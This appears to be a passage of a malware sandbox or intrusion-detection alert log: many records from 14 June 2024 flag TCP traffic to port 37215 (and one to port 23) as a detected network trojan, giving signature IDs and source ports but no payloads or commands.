                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735058
                SID:2829579
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200437
                SID:2829579
                Source Port:52260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343782
                SID:2829579
                Source Port:57104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200040
                SID:2835222
                Source Port:48350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503436
                SID:2829579
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807803
                SID:2829579
                Source Port:36538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763296
                SID:2829579
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052384
                SID:2835222
                Source Port:47034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471048
                SID:2829579
                Source Port:34180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910398
                SID:2835222
                Source Port:32836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088657
                SID:2829579
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910587
                SID:2835222
                Source Port:55066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733309
                SID:2829579
                Source Port:56442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017857
                SID:2829579
                Source Port:43726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718571
                SID:2835222
                Source Port:43798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230410
                SID:2829579
                Source Port:58278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944327
                SID:2829579
                Source Port:43960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563429
                SID:2829579
                Source Port:57136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850043
                SID:2829579
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070349
                SID:2835222
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012304
                SID:2829579
                Source Port:54092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502824
                SID:2835222
                Source Port:33402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673035
                SID:2829579
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113738
                SID:2829579
                Source Port:50202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406763
                SID:2835222
                Source Port:40808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340450
                SID:2829579
                Source Port:57774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410511
                SID:2829579
                Source Port:35008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.093082
                SID:2829579
                Source Port:52470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011964
                SID:2835222
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624398
                SID:2829579
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805391
                SID:2835222
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763071
                SID:2835222
                Source Port:45628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762877
                SID:2829579
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761492
                SID:2829579
                Source Port:36696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717684
                SID:2829579
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646973
                SID:2835222
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681215
                SID:2835222
                Source Port:57032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548232
                SID:2829579
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367151
                SID:2835222
                Source Port:52732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115441
                SID:2835222
                Source Port:33172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715391
                SID:2835222
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011732
                SID:2829579
                Source Port:49422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133558
                SID:2829579
                Source Port:35538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990711
                SID:2829579
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242646
                SID:2829579
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421576
                SID:2829579
                Source Port:51368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581477
                SID:2835222
                Source Port:48216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906594
                SID:2829579
                Source Port:53302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343614
                SID:2829579
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021516
                SID:2829579
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972221
                SID:2835222
                Source Port:58210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943083
                SID:2835222
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180537
                SID:2829579
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184638
                SID:2829579
                Source Port:59294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791934
                SID:2835222
                Source Port:45856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242049
                SID:2829579
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859381
                SID:2835222
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504295
                SID:2829579
                Source Port:41442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714977
                SID:2829579
                Source Port:50778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828303
                SID:2835222
                Source Port:39780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780073
                SID:2835222
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291976
                SID:2835222
                Source Port:34890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807126
                SID:2835222
                Source Port:52056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021239
                SID:2835222
                Source Port:38386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134582
                SID:2835222
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760589
                SID:2829579
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778052
                SID:2835222
                Source Port:48724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320870
                SID:2835222
                Source Port:38224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669159
                SID:2835222
                Source Port:39190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505285
                SID:2829579
                Source Port:46052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342908
                SID:2829579
                Source Port:34626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725407
                SID:2829579
                Source Port:51746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972359
                SID:2829579
                Source Port:48944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147024
                SID:2835222
                Source Port:41490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274973
                SID:2829579
                Source Port:35824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178313
                SID:2835222
                Source Port:46488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421203
                SID:2829579
                Source Port:57458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546580
                SID:2835222
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567434
                SID:2829579
                Source Port:51252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724501
                SID:2829579
                Source Port:45418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987635
                SID:2835222
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764067
                SID:2829579
                Source Port:45022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564490
                SID:2829579
                Source Port:48846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915178
                SID:2829579
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503754
                SID:2829579
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545623
                SID:2829579
                Source Port:46808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547894
                SID:2829579
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021960
                SID:2835222
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702596
                SID:2835222
                Source Port:60972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185104
                SID:2829579
                Source Port:53434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091098
                SID:2829579
                Source Port:55998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111197
                SID:2835222
                Source Port:55538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934883
                SID:2835222
                Source Port:42342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054184
                SID:2835222
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811710
                SID:2829579
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056206
                SID:2835222
                Source Port:49876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020252
                SID:2829579
                Source Port:44666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916832
                SID:2835222
                Source Port:39546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179287
                SID:2829579
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729978
                SID:2835222
                Source Port:48004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134889
                SID:2835222
                Source Port:49608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381603
                SID:2835222
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045531
                SID:2829579
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424304
                SID:2829579
                Source Port:44572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980553
                SID:2829579
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324629
                SID:2835222
                Source Port:38022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473507
                SID:2835222
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339574
                SID:2829579
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412349
                SID:2829579
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759486
                SID:2835222
                Source Port:34832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913514
                SID:2835222
                Source Port:56376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978843
                SID:2835222
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111774
                SID:2829579
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804823
                SID:2829579
                Source Port:46914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412128
                SID:2829579
                Source Port:37214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860400
                SID:2835222
                Source Port:59394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159323
                SID:2835222
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679275
                SID:2829579
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848328
                SID:2829579
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324556
                SID:2835222
                Source Port:51390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618104
                SID:2835222
                Source Port:41580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149509
                SID:2835222
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641289
                SID:2835222
                Source Port:35424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641700
                SID:2835222
                Source Port:52334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469896
                SID:2835222
                Source Port:54864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053176
                SID:2835222
                Source Port:53352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.447992
                SID:2835222
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718621
                SID:2829579
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671264
                SID:2835222
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644502
                SID:2835222
                Source Port:54520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276326
                SID:2835222
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029141
                SID:2835222
                Source Port:39742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029408
                SID:2829579
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806528
                SID:2829579
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024280
                SID:2835222
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150381
                SID:2835222
                Source Port:58910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806826
                SID:2829579
                Source Port:33550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940885
                SID:2829579
                Source Port:43454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847454
                SID:2835222
                Source Port:55552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760867
                SID:2829579
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671837
                SID:2829579
                Source Port:32950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944692
                SID:2829579
                Source Port:57616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014060
                SID:2829579
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364623
                SID:2835222
                Source Port:52770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449731
                SID:2829579
                Source Port:44964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762600
                SID:2829579
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053941
                SID:2835222
                Source Port:59834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968527
                SID:2835222
                Source Port:55546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149626
                SID:2835222
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858919
                SID:2829579
                Source Port:52676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:33.803136
                SID:2840515
                Source Port:49612
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289578
                SID:2829579
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111022
                SID:2829579
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807740
                SID:2829579
                Source Port:41386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405275
                SID:2829579
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224413
                SID:2829579
                Source Port:40088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765755
                SID:2835222
                Source Port:59144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054440
                SID:2835222
                Source Port:42670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320005
                SID:2835222
                Source Port:54242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916361
                SID:2829579
                Source Port:55688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917617
                SID:2829579
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807300
                SID:2835222
                Source Port:41056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503934
                SID:2835222
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410938
                SID:2829579
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718865
                SID:2829579
                Source Port:35176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382742
                SID:2829579
                Source Port:53906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662732
                SID:2835222
                Source Port:47384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322576
                SID:2835222
                Source Port:48660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617293
                SID:2835222
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662245
                SID:2829579
                Source Port:51920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451513
                SID:2829579
                Source Port:37006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017349
                SID:2829579
                Source Port:34746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322160
                SID:2835222
                Source Port:46282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643734
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186126
                SID:2829579
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760725
                SID:2829579
                Source Port:54530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381026
                SID:2835222
                Source Port:47464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424470
                SID:2829579
                Source Port:49682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644179
                SID:2829579
                Source Port:38196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381414
                SID:2835222
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944008
                SID:2835222
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184403
                SID:2829579
                Source Port:58212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724456
                SID:2835222
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184736
                SID:2835222
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504131
                SID:2835222
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735650
                SID:2835222
                Source Port:55444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182326
                SID:2829579
                Source Port:34940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878094
                SID:2829579
                Source Port:49084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148335
                SID:2835222
                Source Port:34844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985056
                SID:2829579
                Source Port:52948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846899
                SID:2829579
                Source Port:57652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407590
                SID:2835222
                Source Port:58490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052759
                SID:2835222
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424367
                SID:2835222
                Source Port:59286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338988
                SID:2835222
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152087
                SID:2829579
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984483
                SID:2835222
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
